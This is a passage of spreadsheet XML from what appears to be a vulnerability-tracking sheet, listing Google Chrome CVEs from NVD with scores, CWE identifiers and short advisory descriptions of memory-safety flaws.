      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87520</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87526</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Use after free in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87526</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87527</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87527</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87528</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Rust in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87528</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87529</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87529</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87547</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87547</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87558</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87558</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87581</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87581</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87607</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>Use after free in Device in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87607</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87609</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>Use after free in Sharing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87609</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87621</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87621</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87634</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87634</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87637</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87637</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87638</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87638</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87643</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87643</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87646</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>Use after free in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87646</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87650</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87650</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87654</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr"/>
